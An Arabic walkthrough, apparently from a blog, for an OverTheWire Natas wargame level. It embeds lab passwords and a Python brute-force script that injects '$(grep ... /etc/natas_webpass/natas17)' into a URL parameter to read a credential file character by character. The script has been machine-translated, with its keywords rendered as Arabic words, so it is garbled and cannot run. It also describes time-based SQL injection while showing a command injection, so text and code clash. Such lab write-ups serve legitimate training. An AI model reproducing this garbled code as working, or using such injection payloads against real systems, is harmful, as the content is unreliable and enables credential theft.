قمنا بتغطية حقن SQL على أساس الوقت باستخدام وظيفة السكون. يعتمد حقن SQL المستند إلى الوقت على الاستجابة التي يتخذها تطبيق الويب لاستنتاج ما إذا كانت هناك ثغرة أمنية في الحقن أم لا. استخدمنا سيناريو معمليًا من المستوى 17 من OverTheWire Natas والذي ينفذ تطبيق ويب يتحقق من وجود المستخدم أم لا.. كان هذا جزءًا من ألعاب الحرب OverTheWire Natas المستوى 17
كلمة مرور ناتاس المستوى 17
8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq
برنامج بايثون النصي
#!/usr/bin/python
يستورد طلبات
حرف = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
يخرج = ''
كلمة المرور = ''
هدف = 'http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh*@natas16.natas.labs.overthewire.org/'
صحيح = 'انتاج:\ن\ن
'
ل س في حرف:
ص = طلبات.يحصل(هدف+'?needle=$(grep '+س+"/etc/natas_webpass/natas17)أيام الجمعة")
لو ص.محتوى.يجد(صحيح) != -1:
يخرج += س
مطبعة 'استخدام: ' + يخرج
مطبعة 'جميع الحروف المستخدمة. بدء القوة الغاشمة... تناول القهوة، قد يستغرق الأمر بعض الوقت!'
ل أنا في يتراوح(32):
ل ج في يخرج:
ص = طلبات.يحصل(هدف+'?needle=$(grep ^'+كلمة المرور+ج+"/etc/natas_webpass/natas17)أيام الجمعة")
لو ص.محتوى.يجد(صحيح) != -1:
كلمة المرور += ج
مطبعة 'كلمة المرور: ' + كلمة المرور + '*' * كثافة العمليات(32 - لين(كلمة المرور))
استراحة
مطبعة 'مكتمل!'
تجول الفيديو
عرض التعليقات